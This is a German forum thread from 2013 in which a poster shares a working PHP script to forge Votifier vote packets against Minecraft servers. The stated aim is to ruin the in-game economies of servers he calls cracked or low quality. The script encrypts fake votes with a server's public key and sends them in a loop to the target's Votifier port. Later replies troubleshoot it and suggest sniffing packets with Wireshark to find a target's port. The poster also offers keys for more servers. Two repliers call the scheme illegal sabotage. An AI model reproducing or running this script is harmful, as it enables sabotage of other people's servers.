Against Cracked/Low Quality Servers!

Page 1 of 2

09/30/2013 19:50 Seakey#1

Hi,
die Zahl der gecrackten Server nimmt immer mehr zu und nicht nur die, auch die Zahl der Server die von Kindern gef�hrt werden und mit einer Baukasten Website laufen steigt stetig.
Leider scheint es im Minecraft Bereich nicht der Fall zu sein das sich Qualit�t durchsetzt, deswegen dieser Thread.

Zeit f�r Ver�nderung!
Im folgenden werde ich ein paar Votifier Public Keys posten, diese kann man dazu missbrauchen Server vollst�ndig um ihre Wirtschaft zu bringen.

Entweder tut man dies mit dem nachfolgendem PHP Script oder folgender Seite: (Website nicht getestet, PHP Script funktioniert auf jeden Fall!)

PHP Code:


			
<?php
$i = 1;
while ($i <= 10) //10 Mit Anzahl der Wunschvotes ersetzen ( Nicht �ber 100 gehen)
{
    echo $i;        
    echo "<br />"; 
    $i++;         

error_reporting(-1);
    ini_set('display_errors', 1);
    ini_set('display_startup_errors', 1);

// Details of the vote.
$str = "VOTE\n" .
      "Toplistname\n" . // Hier Toplistnamen eingeben, im Prinzip k�nnt ihr eingeben was ihr wollt
      "Playername" . // Hier Playernamen von dem User der die Belohnung bekommen soll eingeben
      "127.0.0.1\n" . //Hier Wunsch Ip eintragen
      time()."\n";

$leftover = (256 - strlen($str)) / 2;

while ($leftover > 0) {
    $str .= "\x0";
    $leftover--;
}


$key = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAiKbXYqMiUGEIInvK7FyyxvpUZ4lUqinqRyGYVFnpXLF43nRdbouwgcDzb/ztr38BdLmXHwi3DPcA+fY7pRkTr7KU8Nv6d7TysymPbcbImc8lthOGMMhBA2DlqEIlhKThnkkfWs13M92tR46ViVFYdpqD8NajyRqCHT9vMGmjdltFfDw2qP+4cB0RdjE3+8afJ8RBUCwmYT1UKLGJqAfvxZ4vHoHOUyCyrYuJi/k0Q3s3JxvAPK2A6sY/SfyUd5hXlSsnC7tvEsiLEUr3jcWVh8Nw0Xlk1hwAcBfqUGbg5kzVCrz0cEG2z2aFDqP40XJZtB6Zz4x6hwb0K9yeKSfYYwIDAQAB";
$key = wordwrap($key, 65, "\n", true);
$key = <<<EOF
-----BEGIN PUBLIC KEY-----
$key
-----END PUBLIC KEY-----
EOF;


openssl_public_encrypt($str, $encrypted, $key);

// "1.1.1.1" mit Votifier IP ersetzen, f�r gew�hnlich Host wenn nicht anders angegeben, Port ebenfalls ersetzen, wenn nicht anders angegeben 8192
$socket = fsockopen("1.1.1.1", "8192", $errno, $errstr, 2);

if (!$socket) {
    die("Failed to connect to Votifier.");
}

// Send the contents of the encrypted block to Votifier.
fwrite($socket, $encrypted);
}

Viel Spa�, weitere Folgen sollte Nachfrage bestehen!

09/30/2013 22:29 'Aspirin'#2

Geht das Script nicht? Ging auch auf eigenen Serven nicht..

10/01/2013 06:58 Seakey#3

Funktioniert zu 100%
Einfach die Daten ersetzen, auch den Secretkey ;)
Dann auf nen Webserver schmei�en und aufrufen.
Die Ausgabe sollte dann eine Aufz�hlung von 1-X sein je nach Votes.

10/01/2013 07:02 'Aspirin'#4

Ich habe den Key und die IP ersetzt, die Votes werden auch von 1 bis X angezeigt, jedoch passiert ingame nichts...

10/01/2013 14:33 Seakey#5

Welcher Server?
Hast du das ganze auch schon per Website probiert?

10/01/2013 15:37 Kante'#6

Ich hab wirklich keine Ahnung von php, aber wenn ein anderer Port + IP angegeben ist, geht es nicht mehr?
Und woher hast du den Key bekommen?

Danke schonmal im Vorraus

10/01/2013 15:42 'Aspirin'#7

Kante, klar kann das dann nicht gehen, wenn du den port und die IP �nderst, das ist ja die Einstellung, wohin PHP das senden soll ;)

10/01/2013 16:05 Kante'#8

Quote:

Originally Posted by ghac/killer

Kante, klar kann das dann nicht gehen, wenn du den port und die IP �nderst, das ist ja die Einstellung, wohin PHP das senden soll ;)

Ja, ich wei� ja nicht woher er den Secretkey hat, aber wenn er da ohne Rechte dran gekommen ist, wird er vielleicht auch wissen, wie man die IP + den Port bekommt :)

10/01/2013 16:31 Seakey#9

IP+ Port ist doch oben jeweils angegeben.

Secretkeys von welchen Servern sind erw�nscht?

10/01/2013 16:33 Kante'#10

Quote:

Originally Posted by Seakey

IP+ Port ist doch oben jeweils angegeben.

Secretkeys von welchen Servern sind erw�nscht?

ja, aber bei Server, die IP + Port ge�ndert haben? Wie bekommt man es dort raus?

10/01/2013 17:32 Probber#11

Quote:

Originally Posted by Kante'

ja, aber bei Server, die IP + Port ge�ndert haben? Wie bekommt man es dort raus?

Du wirst doch wohl zu einem Minecraftserver eine Ip herraus suchen k�nnen... Ist die gleiche auf dem auch der Minecraftserver l�uft (Im Normalfall)

Au�erdem ist die ganze Geschichte sowieso illegal, Grund: Computersabotage

Mit freundlichen Gr��en

Probber

10/01/2013 17:35 Kante'#12

Quote:

Originally Posted by Probber

Du wirst doch wohl zu einem Minecraftserver eine Ip herraus suchen k�nnen... Ist die gleiche auf dem auch der Minecraftserver l�uft (Im Normalfall)

Au�erdem ist die ganze Geschichte sowieso illegal, Grund: Computersabotage

Mit freundlichen Gr��en

Probber

Bei Votifier kann man die IP + Port �ndern..

10/01/2013 17:50 Probber#13

Quote:

Originally Posted by Kante'

Bei Votifier kann man die IP + Port �ndern..

Tja dann w�rde ich mal Wireshark �ffnen und mal die Pakete sniffen, dann haste schon mal die verschl�sselten Pakete sowie IP + Port.

Mit freundlichen Gr��en

Probber

10/01/2013 18:36 Seakey#14

Die Ips/Ports sind doch angegeben wenn es nicht der Host sein sollte:

10/01/2013 19:25 BackzterHD#15

In der Theorie k�nnte man dich jetzt Anzeigen bzw. die die dies auch nur Probieren.

Und mit der ausrede "Wollte das nicht" oder "Wusste ich nicht " wird nicht weiter geholfen.

Unwissenheit sch�tzt nicht vorm Gericht

Page 1 of 2